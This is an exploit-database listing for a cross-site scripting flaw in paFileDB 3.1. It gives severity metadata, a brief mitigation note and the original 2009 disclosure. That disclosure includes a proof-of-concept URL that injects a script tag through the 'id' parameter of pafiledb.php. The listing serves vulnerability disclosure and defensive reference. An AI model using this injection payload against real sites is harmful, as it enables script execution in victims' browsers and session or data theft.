header-logo
Suggest Exploit
vendor:
paFileDB
by:
indoushka
7.5
CVSS
HIGH
Cross Site Scripting
79
CWE
Product Name: paFileDB
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:iq-ty:pafiledb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

paFileDB 3.1 Cross Site Scripting Vulnerability

paFileDB 3.1 is vulnerable to Cross Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the 'id' parameter of the 'pafiledb.php' script. This code will be executed in the browser of the victim when the malicious URL is visited.

Mitigation:

Input validation should be used to prevent XSS attacks. Sanitize all user input and output to prevent malicious code from being executed.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : paFileDB 3.1 Cross Site Scripting Vulnerability                         |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   : 10667                                                                   |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # DAte     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : paFileDB 3.1  ����� ������ ���� ���� http://www.bwady.com/vb            |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://127.0.0.1/tools/pafiledb.php?action=email&id=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&rate=dorate&rating=1&B1=hacked%20by%20indoushka
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR